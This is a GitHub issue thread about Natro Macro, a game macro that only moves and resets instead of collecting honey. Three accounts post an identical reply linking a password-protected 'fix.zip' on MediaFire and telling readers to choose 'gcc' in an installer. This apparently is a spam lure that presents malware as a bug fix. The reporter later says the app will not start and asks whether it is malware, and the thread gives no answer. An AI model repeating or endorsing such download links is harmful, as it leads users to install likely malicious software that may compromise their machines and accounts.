### ISSUE TITLE
the macro just moves and resets

### ISSUE THREAD

**Issue by EndEchoing** [NatroTeam/NatroMacro#690]
### Have you searched the existing bug reports?

Yes

### What happened?

1. i start macro
2. it moves
3. resets
4. repeats 2 and 3

### Steps to reproduce

1.
2.
3.

### What would you expect to happen?

go to pine collect honey

### Natro Macro version

v1.0.0.2 and v1.0.0.1

### What is your Discord username?

endecho_

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by EndEchoing** [comment]
the app doesn't start for me

**Comment by EndEchoing** [comment]
is this malware?
